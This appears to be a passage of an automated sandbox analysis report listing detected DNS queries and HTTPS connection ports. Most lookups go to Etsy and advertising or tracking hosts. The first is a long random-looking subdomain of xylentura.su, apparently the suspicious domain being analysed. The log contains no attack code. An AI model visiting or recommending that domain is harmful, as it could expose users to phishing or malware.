    Source: global trafficDNS traffic detected: DNS query: j9yl2xu57ulgndrtcc99d5jp3bkrq1cqpaoxrxdi15dzlqxnxjsvziw.xylentura.su
    Source: global trafficDNS traffic detected: DNS query: www.etsy.com
    Source: global trafficDNS traffic detected: DNS query: i.etsystatic.com
    Source: global trafficDNS traffic detected: DNS query: transcend-cdn.com
    Source: global trafficDNS traffic detected: DNS query: www.dwin1.com
    Source: global trafficDNS traffic detected: DNS query: trkn.us
    Source: global trafficDNS traffic detected: DNS query: www.facebook.com
    Source: global trafficDNS traffic detected: DNS query: s.pinimg.com
    Source: global trafficDNS traffic detected: DNS query: 8666735.fls.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: web.btncdn.com
    Source: global trafficDNS traffic detected: DNS query: resources.xg4ken.com
    Source: global trafficDNS traffic detected: DNS query: cdn.pdst.fm
    Source: global trafficDNS traffic detected: DNS query: analytics.tiktok.com
    Source: global trafficDNS traffic detected: DNS query: pt.ispot.tv
    Source: global trafficDNS traffic detected: DNS query: pixels.spotify.com
    Source: global trafficDNS traffic detected: DNS query: analytics.google.com
    Source: global trafficDNS traffic detected: DNS query: ad.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: 9910951.fls.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: lantern.roeyecdn.com
    Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: pixel.streetmetrics.io
    Source: global trafficDNS traffic detected: DNS query: tags.w55c.net
    Source: global trafficDNS traffic detected: DNS query: adservice.google.com
    Source: global trafficDNS traffic detected: DNS query: insight.adsrvr.org
    Source: global trafficDNS traffic detected: DNS query: js.adsrvr.org
    Source: global trafficDNS traffic detected: DNS query: ct.pinterest.com
    Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: google.com
    Source: global trafficDNS traffic detected: DNS query: lantern.roeye.com
    Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
    Source: global trafficDNS traffic detected: DNS query: match.adsrvr.org
    Source: global trafficDNS traffic detected: DNS query: pixel.rubiconproject.com
    Source: global trafficDNS traffic detected: DNS query: cm.g.doubleclick.net
    Source: global trafficDNS traffic detected: DNS query: dsum-sec.casalemedia.com
    Source: global trafficDNS traffic detected: DNS query: d.agkn.com
    Source: global trafficDNS traffic detected: DNS query: telemetry.transcend.io
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
    Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
    Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
    Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
    Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
    Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
    Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
    Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
    Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
    Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
    Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
    Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
    Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
